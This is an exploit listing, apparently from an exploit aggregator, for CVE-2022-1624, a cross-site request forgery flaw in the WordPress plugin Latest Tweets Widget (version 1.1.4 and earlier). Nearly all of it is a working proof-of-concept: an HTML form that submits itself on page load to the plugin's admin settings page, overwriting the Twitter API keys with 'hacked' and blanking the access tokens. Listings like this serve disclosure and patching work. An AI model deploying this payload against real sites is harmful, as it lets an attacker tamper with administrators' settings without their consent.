Exploit for Latest Tweets Widget <= 1.1.4 - Arbitrary Settings Update via CSRF CVE-2022-1624

Name: Exploit for Latest Tweets Widget <= 1.1.4 - Arbitrary Settings Update via CSRF CVE-2022-1624
Rating: 5 (72 reviews)

2022-05-18 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:06E547FD-CDDF-4294-87BE-54F58D6138A7
<form id="test" action="https://example.com/wp-admin/options-general.php?page=twitter-api-admin" method="POST">
    <input type="text" name="saf_twitter[consumer_key]" value="hacked">
    <input type="text" name="saf_twitter[consumer_secret]" value="hacked">
    <input type="text" name="saf_twitter[access_key]" value="">
    <input type="text" name="saf_twitter[access_secret]" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>